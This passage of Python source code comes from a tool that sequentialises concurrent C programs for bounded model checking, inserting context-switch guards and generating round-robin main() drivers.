)):\n self.__stmtCount += 1\n self.__maxInCompound = self.__stmtCount\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n stamp = '__CSEQ_rawline(\"%s%s_%s: IF(%s,%s,%s%s_%s)\");\\n' % (self.__startChar, self.__currentThread, str(self.__stmtCount),threadIndex,str(self.__stmtCount), self.__startChar, self.__currentThread, str(self.__stmtCount+1))\n newStmt = stamp + self.visit(stmt.stmt) + ';\\n'\n else:\n newStmt = self.visit(stmt.stmt) + ';\\n'\n\n # GUARD(%s,%s)\n guard = 
''\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n if not self.__atomic:\n if self.__decomposepc:\n guard = '__CSEQ_assume( __cs_pc_cs_%s >= %s );\\n' % (threadIndex,self.__stmtCount+1)\n elif self.__one_pc_cs:\n guard = '__CSEQ_assume( __cs_pc_cs >= %s );\\n' % (self.__stmtCount+1)\n else:\n guard = '__CSEQ_assume( __cs_pc_cs[%s] >= %s );\\n' % (threadIndex,self.__stmtCount+1)\n\n newStmt = self._make_indent()+ stmt.name + ': ' + guard + newStmt+ '\\n'\n\n s += newStmt\n # Case 3: all the rest....\n elif (type(stmt) not in (pycparser.c_ast.Compound, pycparser.c_ast.Goto, pycparser.c_ast.Decl)\n and not (self.__currentThread=='main' and self.__firstThreadCreate == False) or (self.__currentThread=='main' and self.__stmtCount == -1)) :\n\n # --1-- Simulate a visit to the stmt block to see whether it makes any use of pointers or shared memory.\n #\n globalAccess = self.__globalAccess(stmt)\n newStmt = ''\n\n self.lines = [] # override core.module marking behaviour, otherwise module.visit() won't insert any marker\n\n # --2-- Now rebuilds the stmt block again,\n # this time using the proper formatting\n # (now we know if the statement is accessing global memory,\n # so to insert the stamp at the beginning when needed)\n #\n if not self.__atomic and self.__stmtCount == -1: # first statement in a thread\n self.__stmtCount += 1\n self.__maxInCompound = self.__stmtCount\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n stamp = '__CSEQ_rawline(\"IF(%s,%s,%s%s_%s)\");\\n' % (threadIndex,str(self.__stmtCount), self.__startChar, self.__currentThread, str(self.__stmtCount+1))\n code = self.visit(stmt)\n newStmt = stamp + code + ';\\n'\n elif (not self.__visit_funcReference and (\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == '__CSEQ_atomic_begin') or\n (not self.__atomic and\n (globalAccess or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == core.common.changeID['pthread_create']) or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == core.common.changeID['pthread_join']) or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name.startswith('__CSEQ_atomic') and not stmt.name.name == '__CSEQ_atomic_end') or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name.startswith('__CSEQ_assume')) or\n (type(stmt) == pycparser.c_ast.FuncCall and stmt.name.name == '__cs_cond_wait_2')\n )\n )\n )):\n self.__stmtCount += 1\n self.__maxInCompound = self.__stmtCount\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n stamp = '__CSEQ_rawline(\"%s%s_%s: IF(%s,%s,%s%s_%s)\");\\n' % (self.__startChar, self.__currentThread, str(self.__stmtCount),threadIndex,str(self.__stmtCount), self.__startChar, self.__currentThread, str(self.__stmtCount+1))\n code = self.visit(stmt)\n newStmt = stamp + code + ';\\n'\n else:\n newStmt = self.visit(stmt) + \";\\n\"\n\n s += newStmt\n else:\n newStmt = self.visit(stmt) + \";\\n\"\n s += newStmt\n\n self.indent_level -= 1\n s += self._make_indent() + '}\\n'\n\n return s\n\n\n def visit_FuncDef(self, n):\n if (n.decl.name.startswith('__CSEQ_atomic_') or\n #n.decl.name.startswith(core.common.funcPrefixChange['__CSEQ_atomic']) or\n n.decl.name == '__CSEQ_assert' or\n n.decl.name in self.Parser.funcReferenced ): # <--- functions called through pointers are not inlined yet\n # return self.Parser.funcBlock[n.decl.name]\n 
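# note: such functions are re-emitted with __atomic set, so the visitor\n        # generates no visible-statement labels (context-switch points) inside them\n        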
self.__currentThread = n.decl.name\n self.__visit_funcReference = True\n #ret = self.otherparser.visit(n)\n oldatomic = self.__atomic\n self.__atomic = True\n decl = self.visit(n.decl)\n body = self.visit(n.body)\n self.__atomic = oldatomic\n s = decl + '\\n' + body + '\\n'\n self.__currentThread = ''\n self.__visit_funcReference = False\n return s\n\n self.__first = False\n self.__currentThread = n.decl.name\n self.__firstThreadCreate = False\n\n decl = self.visit(n.decl)\n self.indent_level = 0\n body = self.visit(n.body)\n\n f = ''\n\n self.__lines[self.__currentThread] = self.__stmtCount\n ###print \"THREAD %s, LINES %s \\n\\n\" % (self.__currentThread, self.__lines)\n\n #\n if n.param_decls:\n knrdecls = ';\\n'.join(self.visit(p) for p in n.param_decls)\n self.__stmtCount = -1\n #body = body[:body.rfind('}')] + self._make_indent() + returnStmt + '\\n}'\n f = decl + '\\n' + knrdecls + ';\\n'\n else:\n self.__stmtCount = -1\n #body = body[:body.rfind('}')] + self._make_indent() + returnStmt + '\\n}'\n f = decl + '\\n'\n\n # Remove arguments (if any) for main() and transform them into local variables in main_thread.\n # TODO re-implement seriously.\n if self.__currentThread == 'main':\n f = '%s main_thread(void)\\n' % self.Parser.funcBlockOut[\n self.__currentThread]\n main_args = self.Parser.funcBlockIn['main']\n args = ''\n if main_args.find('void') != -1 or main_args == '':\n main_args = ''\n else:\n main_args = re.sub(r'\\*(.*)\\[\\]', r'** \\1', main_args)\n main_args = re.sub(r'(.*)\\[\\]\\[\\]', r'** \\1', main_args)\n # split argument\n main_args = main_args.split(',')\n if len(main_args) != 2:\n self.warn('main function may have been defined incorrectly, %s' % main_args)\n # args = 'static ' + main_args[0] + '= %s; ' % self.__argc\n # args = 'static ' + main_args[0] + '; ' # Disable this for SVCOMP\n args = main_args[0] + '; '\n # argv = self.__argv.split(' ')\n # argv = '{' + ','.join(['\\\"%s\\\"' % v for v in argv]) + '}'\n # args += 'static ' + main_args[1] + '= %s;' % argv\n # args += 'static ' + main_args[1] + ';' # Disable this for SVCOMP\n args += main_args[1] + ';'\n body = '{' + args + body[body.find('{') + 1:]\n\n f += body + '\\n'\n\n self.__currentThread = ''\n\n return f + '\\n\\n'\n\n\n def visit_If(self, n):\n ifStart = self.__maxInCompound # label where the if stmt begins\n\n s = 'if ('\n\n if n.cond:\n condition = self.visit(n.cond)\n s += condition\n\n s += ')\\n'\n s += self._generate_stmt(n.iftrue, add_indent=True)\n\n ifEnd = self.__maxInCompound # label for the last stmt in the if block: if () { block; }\n nextLabelID = ifEnd+1\n\n if n.iffalse:\n elseBlock = self._generate_stmt(n.iffalse, add_indent=True)\n\n elseEnd = self.__maxInCompound # label for the last stmt in the if_false block if () {...} else { block; }\n\n if ifStart < ifEnd:\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n # GUARD(%s,%s)\n if not self.__visit_funcReference:\n if self.__decomposepc:\n elseHeader = '__CSEQ_assume( __cs_pc_cs_%s >= %s );' % (threadIndex, str(ifEnd+1))\n elif self.__one_pc_cs:\n elseHeader = '__CSEQ_assume( __cs_pc_cs >= %s );' % (str(ifEnd+1))\n else:\n elseHeader = '__CSEQ_assume( __cs_pc_cs[%s] >= %s );' % (threadIndex, str(ifEnd+1))\n else:\n elseHeader = ''\n\n nextLabelID = elseEnd+1\n s += self._make_indent() + 'else\\n'\n\n elseBlock = elseBlock.replace('{', '{ '+elseHeader, 1)\n s += elseBlock\n\n header = ''\n\n if ifStart+1 < nextLabelID:\n threadIndex = 
self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n # GUARD(%s,%s)\n if not self.__visit_funcReference:\n if self.__decomposepc:\n footer = '__CSEQ_assume( __cs_pc_cs_%s >= %s );' % (threadIndex, nextLabelID)\n elif self.__one_pc_cs:\n footer = '__CSEQ_assume( __cs_pc_cs >= %s );' % (nextLabelID)\n else:\n footer = '__CSEQ_assume( __cs_pc_cs[%s] >= %s );' % (threadIndex, nextLabelID)\n else:\n footer = ''\n\n '''\n if n.iffalse:\n header = 'ASS_ELSE(%s, %s, %s)' % (condition, ifEnd+1, elseEnd+1) + '\\n' + self._make_indent()\n else:\n if ifEnd > ifStart:\n header = 'ASS_THEN(%s, %s)' % (condition, ifEnd+1) + '\\n' + self._make_indent()\n else: header = ''\n '''\n\n return header + s + self._make_indent() + footer\n\n\n def visit_Return(self, n):\n if self.__currentThread != '__CSEQ_assert' and self.__currentThread not in self.Parser.funcReferenced and not self.__atomic:\n self.error(\"error: %s: return statement in thread '%s'.\\n\" % (self.getname(), self.__currentThread))\n\n s = 'return'\n if n.expr: s += ' ' + self.visit(n.expr)\n return s + ';'\n\n\n def visit_Label(self, n):\n self.__labelLine[self.__currentThread, n.name] = self.__stmtCount\n return n.name + ':\\n' + self._generate_stmt(n.stmt)\n\n\n def visit_Goto(self, n):\n self.__gotoLine[self.__currentThread, n.name] = self.__stmtCount\n extra = '<%s,%s>\\n' % (self.__currentThread, n.name) + self._make_indent()\n extra = ''\n return extra + 'goto ' + n.name + ';'\n\n def visit_ArrayRef(self, n):\n arrref = self._parenthesize_unless_simple(n.name)\n subscript = self.visit(n.subscript)\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n if subscript == '__cs_thread_index' and self.__currentThread != '':\n subscript = '%s' % threadIndex\n s = arrref + '[' + subscript + ']'\n return s\n\n def visit_ID(self, n):\n # If this ID corresponds either to a global variable,\n # or to a pointer...\n #\n if ((self.__isGlobal(self.__currentThread, n.name) or self.__isPointer(self.__currentThread, n.name)) and not\n n.name.startswith('__cs_thread_local_')):\n #print \"variable %s in %s is global\\n\" % (n.name, self.__currentThread)\n self.__globalMemoryAccessed = True\n\n # Rename the IDs of main() arguments\n #if self.__currentThread == 'main' and n.name in self.Parser.varNames['main'] and self.Parser.varKind['main',n.name] == 'p':\n # return '__main_params_' + n.name\n\n return n.name\n\n\n def visit_FuncCall(self, n):\n fref = self._parenthesize_unless_simple(n.name)\n args = self.visit(n.args)\n\n if fref == '__CSEQ_atomic_begin':\n if not self.__visit_funcReference:\n self.__atomic = True\n return ''\n elif fref == '__CSEQ_atomic_end':\n if not self.__visit_funcReference:\n self.__atomic = False\n return ''\n elif fref.startswith('__CSEQ_atomic_'): self.__globalMemoryAccessed = True\n elif fref == core.common.changeID['pthread_cond_wait']:\n self.error('pthread_cond_wait in input code (use conditional wait converter module first)')\n\n\n # When a thread is created, extract its function name\n # based on the 3rd parameter in the pthread_create() call:\n #\n # pthread_create(&id, NULL, f, &arg);\n # ^^^\n #\n if fref == core.common.changeID['pthread_create']: # TODO re-write AST-based (see other modules)\n fName = args[:args.rfind(',')]\n fName = fName[fName.rfind(',')+2:]\n fName = fName.replace('&', '')\n\n ##print \"checking fName = %s\\n\\n\" % fName\n\n if fName not in self.__threadName:\n 
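# first use of this function as a thread: register it and assign the next\n                # free thread index, passed to pthread_create as an extra last argument\n                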
self.__threadName.append(fName)\n self.__threadCount = self.__threadCount + 1\n\n args = args + ', %s' % (self.__threadCount)\n self.__threadIndex[fName] = self.__threadCount\n else:\n # when visiting from the 2nd time on (if it happens),\n # reuse the old thread indexS!\n args = args + ', %s' % (self.__threadIndex[fName])\n\n self.__firstThreadCreate = True\n\n if fref == core.common.changeID['pthread_exit']:\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n return fref + '(' + args + ', %s)' % threadIndex\n\n '''\n Avoid using pointers to handle mutexes\n by changing the function calls,\n there are two cases:\n\n pthread_mutex_lock(&l) -> __cs_mutex_lock(l)\n pthread_mutex_lock(ptr) -> __cs_mutex_lock(*ptr)\n\n TODO:\n this needs proper implementation,\n one should check that the argument is not referenced\n elsewhere (otherwise this optimisation will not work)\n '''\n\n # Optimization for removing __cs_thread_index variable from global scope\n if ((fref == core.common.changeID['pthread_mutex_lock'] ) or (fref == core.common.changeID['pthread_mutex_unlock']) or\n fref.startswith('__cs_cond_wait_')):\n threadIndex = self.Parser.threadIndex[self.__currentThread] if self.__currentThread in self.Parser.threadIndex else 0\n return fref + '(' + args + ', %s)' % threadIndex\n\n return fref + '(' + args + ')'\n\n ########################################################################################\n ########################################################################################\n ########################################################################################\n ########################################################################################\n ########################################################################################\n ########################################################################################\n\n def __createMainRoundRobinDecomposePC(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n\n ''' Part I:\n Pre-guessed jump lengths have a size in bits depending on the size of the thread.\n '''\n for r in range(0, ROUNDS):\n for t in range(0,self.__threadbound+1):\n threadsize = self.__lines[self.__threadName[t]]\n k = int(math.floor(math.log(threadsize,2)))+1\n self._bitwidth['main','__cs_tmp_t%s_r%s' % (t,r)] = k\n\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" unsigned int __cs_tmp_t0_r0 %s;\\n\" % self.__extra_nondet\n main +=\" __CSEQ_assume(__cs_tmp_t0_r0 > 0);\\n\"\n main +=\" __cs_pc_cs_0 = __cs_tmp_t0_r0;\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs_0 <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc_0 = __cs_pc_cs_0;\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r0 %s;\\n\" % (i, self.__extra_nondet)\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs_%s = __cs_tmp_t%s_r0;\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs_%s <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc_%s = __cs_pc_cs_%s;\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, 
ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (round, self.__extra_nondet)\n main +=\" if (__cs_active_thread[0]) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs_0 = __cs_tmp_t0_r%s;\\n\" % (round)\n else:\n main +=\" __cs_pc_cs_0 = __cs_pc_0 + __cs_tmp_t0_r%s;\\n\" % (round)\n main +=\" __CSEQ_assume(__cs_pc_cs_0 >= __cs_pc_0);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs_0 <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc_0 = __cs_pc_cs_0;\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r%s %s;\\n\" % (i, round, self.__extra_nondet)\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs_%s = __cs_tmp_t%s_r%s;\\n\" % (i, i, round)\n else:\n main +=\" __cs_pc_cs_%s = __cs_pc_%s + __cs_tmp_t%s_r%s;\\n\" % (i, i, i, round)\n main +=\" __CSEQ_assume(__cs_pc_cs_%s >= __cs_pc_%s);\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs_%s <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc_%s = __cs_pc_cs_%s;\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n k = int(math.floor(math.log(self.__lines['main'],2)))+1\n main += \" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (ROUNDS, self.__extra_nondet)\n self._bitwidth['main','__cs_tmp_t0_r%s' % (ROUNDS)] = k\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs_0 = __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n else:\n main +=\" __cs_pc_cs_0 = __cs_pc_0 + __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n main +=\" __CSEQ_assume(__cs_pc_cs_0 >= __cs_pc_0);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs_0 <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n def __createMainRoundRobinOnePCCS(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n\n ''' Part I:\n Pre-guessed jump lengths have a size in bits depending on the size of the thread.\n '''\n\n maxsize = 0\n for t in self.__lines:\n maxsize = max(maxsize, int(self.__lines[t]))\n k = int(math.floor(math.log(maxsize,2)))+1\n\n for r in range(0, ROUNDS):\n for t in range(0,self.__threadbound+1):\n # threadsize = self.__lines[self.__threadName[t]]\n # k = int(math.floor(math.log(threadsize,2)))+1\n self._bitwidth['main','__cs_tmp_t%s_r%s' % (t,r)] = k\n\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" unsigned int __cs_tmp_t0_r0;\\n\"\n main +=\" __CSEQ_assume(__cs_tmp_t0_r0 > 0);\\n\"\n main +=\" __cs_pc_cs = __cs_tmp_t0_r0;\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs;\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r0;\\n\" % (i)\n main +=\" if 
(__cs_active_thread[%s]) {\\n\" % (i)\n                main +=\" __cs_pc_cs = __cs_tmp_t%s_r0;\\n\" % (i)\n                main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines[t])\n                main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n                main +=\" __cs_pc[%s] = __cs_pc_cs;\\n\" % (i)\n                main +=\" }\\n\\n\"\n                i += 1\n\n        ''' Other rounds\n        '''\n        for round in range(1, ROUNDS):\n            main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n            # For main thread\n            main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n            main +=\" unsigned int __cs_tmp_t0_r%s;\\n\" % (round)\n            main +=\" if (__cs_active_thread[0]) {\\n\"\n            if self.__guess_cs_only:\n                main +=\" __cs_pc_cs = __cs_tmp_t0_r%s;\\n\" % (round)\n            else:\n                main +=\" __cs_pc_cs = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (round)\n                main +=\" __CSEQ_assume(__cs_pc_cs >= __cs_pc[0]);\\n\"\n            main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines['main'])\n            main +=\" main_thread();\\n\"\n            main +=\" __cs_pc[0] = __cs_pc_cs;\\n\"\n            main +=\" }\\n\\n\"\n            main +=\"\\n\"\n            # For other threads\n            i = 1\n            for t in self.__threadName:\n                if t == 'main': continue\n                if i <= self.__threadbound:\n                    main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n                    main +=\" unsigned int __cs_tmp_t%s_r%s;\\n\" % (i, round)\n                    main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n                    if self.__guess_cs_only:\n                        main +=\" __cs_pc_cs = __cs_tmp_t%s_r%s;\\n\" % (i, round)\n                    else:\n                        main +=\" __cs_pc_cs = __cs_pc[%s] + __cs_tmp_t%s_r%s;\\n\" % (i, i, round)\n                        main +=\" __CSEQ_assume(__cs_pc_cs >= __cs_pc[%s]);\\n\" % (i)\n                    main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines[t])\n                    main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n                    main +=\" __cs_pc[%s] = __cs_pc_cs;\\n\" % (i)\n                    main +=\" }\\n\\n\"\n                    i += 1\n\n\n        ''' Last call to main\n        '''\n\n        # For the last call to the main thread\n        # k = int(math.floor(math.log(self.__lines['main'],2)))+1\n        main += \" unsigned int __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n        self._bitwidth['main','__cs_tmp_t0_r%s' % (ROUNDS)] = k\n        main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n        if self.__guess_cs_only:\n            main +=\" __cs_pc_cs = __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n        else:\n            main +=\" __cs_pc_cs = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n            main +=\" __CSEQ_assume(__cs_pc_cs >= __cs_pc[0]);\\n\"\n        main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines['main'])\n        main +=\" main_thread();\\n\"\n        main +=\" }\\n\"\n        main += \" return 0;\\n\"\n        main += \"}\\n\\n\"\n\n        return main\n\n    def __createMainDecomposePC(self, ROUNDS):\n        ''' New main driver:\n        '''\n        main = ''\n        main += \"int main(void) {\\n\"\n\n        ''' Part I:\n            Pre-guessed jump lengths have a size in bits depending on the size of the thread.\n        '''\n        for r in range(0, ROUNDS):\n            for t in range(0,self.__threadbound+1):\n                threadsize = self.__lines[self.__threadName[t]]\n                k = int(math.floor(math.log(threadsize,2)))+1\n                self._bitwidth['main','__cs_tmp_t%s_r%s' % (t,r)] = k\n\n        ''' First round (round 0)\n        '''\n        round = 0\n        # Main thread\n        main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n        main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n        main +=\" unsigned int __cs_tmp_t0_r0 %s;\\n\" % self.__extra_nondet\n        main +=\" __CSEQ_assume(__cs_tmp_t0_r0 > 0);\\n\"\n        main +=\" __cs_pc_cs_0 = __cs_tmp_t0_r0;\\n\"\n        main +=\" __CSEQ_assume(__cs_pc_cs_0 <= %s);\\n\" % (self.__lines['main'])\n        main +=\" main_thread();\\n\"\n        main +=\" __cs_last_thread = 0;\\n\"\n        main +=\" __cs_pc_0 = __cs_pc_cs_0;\\n\"\n        main +=\"\\n\"\n        # Other threads\n        i = 1\n        for t in self.__threadName:\n            if t == 'main': continue\n            if i <= 
self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r0 %s;\\n\" % (i, self.__extra_nondet)\n # main +=\" __CSEQ_assume(__cs_tmp_t%s_r0 >= 0);\\n\" % (i)\n main +=\" unsigned int __cs_run_t%s_r0 = (__cs_tmp_t%s_r0 && (__cs_active_thread[%s] == 1));\\n\" % (i, i, i)\n self._bitwidth['main','__cs_run_t%s_r0' % (i)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t%s_r0) {\\n\" % (i)\n main +=\" __cs_pc_cs_%s = __cs_tmp_t%s_r0;\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs_%s <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_last_thread = %s;\\n\" % (i)\n main +=\" __cs_pc_%s = __cs_pc_cs_%s;\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" __CSEQ_assume(__cs_last_thread != 0);\\n\"\n main +=\" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (round, self.__extra_nondet)\n # main +=\" __CSEQ_assume(__cs_tmp_t0_r%s >= 0);\\n\" % (round)\n main +=\" unsigned int __cs_run_t0_r%s = (__cs_tmp_t0_r%s && (__cs_active_thread[0] == 1));\\n\" % (round, round)\n self._bitwidth['main','__cs_run_t0_r%s' % (round)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t0_r%s) {\\n\" % (round)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs_0 = __cs_tmp_t0_r%s;\\n\" % (round)\n else:\n main +=\" __cs_pc_cs_0 = __cs_pc_0 + __cs_tmp_t0_r%s;\\n\" % (round)\n main +=\" __CSEQ_assume(__cs_pc_cs_0 >= __cs_pc_0);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs_0 <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_last_thread = 0;\\n\"\n main +=\" __cs_pc_0 = __cs_pc_cs_0;\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" __CSEQ_assume(__cs_last_thread != %s);\\n\" % (i)\n main +=\" unsigned int __cs_tmp_t%s_r%s %s;\\n\" % (i, round, self.__extra_nondet)\n # main +=\" __CSEQ_assume(__cs_tmp_t%s_r%s >= 0);\\n\" % (i, round)\n main +=\" unsigned int __cs_run_t%s_r%s = (__cs_tmp_t%s_r%s && (__cs_active_thread[%s] == 1));\\n\" % (i, round, i, round, i)\n self._bitwidth['main','__cs_run_t%s_r%s' % (i, round)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t%s_r%s) {\\n\" % (i, round)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs_%s = __cs_tmp_t%s_r%s;\\n\" % (i, i, round)\n else:\n main +=\" __cs_pc_cs_%s = __cs_pc_%s + __cs_tmp_t%s_r%s;\\n\" % (i, i, i, round)\n main +=\" __CSEQ_assume(__cs_pc_cs_%s >= __cs_pc_%s);\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs_%s <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_last_thread = %s;\\n\" % (i)\n main +=\" __cs_pc_%s = __cs_pc_cs_%s;\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n k = int(math.floor(math.log(self.__lines['main'],2)))+1\n main += \" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (ROUNDS, self.__extra_nondet)\n self._bitwidth['main','__cs_tmp_t0_r%s' % (ROUNDS)] = k\n # main +=\" __CSEQ_assume(__cs_tmp_t0_r%s >= 0);\\n\" % (ROUNDS)\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs_0 = __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n else:\n 
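# default mode: the guessed value is a jump offset added to the saved program\n            # counter, so each thread can only resume at or after its last context switch\n            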
main +=\" __cs_pc_cs_0 = __cs_pc_0 + __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n            main +=\" __CSEQ_assume(__cs_pc_cs_0 >= __cs_pc_0);\\n\"\n        main +=\" __CSEQ_assume(__cs_pc_cs_0 <= %s);\\n\" % (self.__lines['main'])\n        main +=\" main_thread();\\n\"\n        main +=\" }\\n\"\n        main += \" return 0;\\n\"\n        main += \"}\\n\\n\"\n\n        return main\n\n    def __createMainOnePCCS(self, ROUNDS):\n        ''' New main driver:\n        '''\n        main = ''\n        main += \"int main(void) {\\n\"\n\n        ''' Part I:\n            Pre-guessed jump lengths have a size in bits depending on the size of the thread.\n        '''\n\n        maxsize = 0\n        for t in self.__lines:\n            maxsize = max(maxsize, int(self.__lines[t]))\n        k = int(math.floor(math.log(maxsize,2)))+1\n\n        for r in range(0, ROUNDS):\n            for t in range(0,self.__threadbound+1):\n                # threadsize = self.__lines[self.__threadName[t]]\n                # k = int(math.floor(math.log(threadsize,2)))+1\n                self._bitwidth['main','__cs_tmp_t%s_r%s' % (t,r)] = k\n\n        ''' First round (round 0)\n        '''\n        round = 0\n        # Main thread\n        main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n        main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n        main +=\" unsigned int __cs_tmp_t0_r0;\\n\"\n        main +=\" __CSEQ_assume(__cs_tmp_t0_r0 > 0);\\n\"\n        main +=\" __cs_pc_cs = __cs_tmp_t0_r0;\\n\"\n        main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines['main'])\n        main +=\" main_thread();\\n\"\n        main +=\" __cs_last_thread = 0;\\n\"\n        main +=\" __cs_pc[0] = __cs_pc_cs;\\n\"\n        main +=\"\\n\"\n        # Other threads\n        i = 1\n        for t in self.__threadName:\n            if t 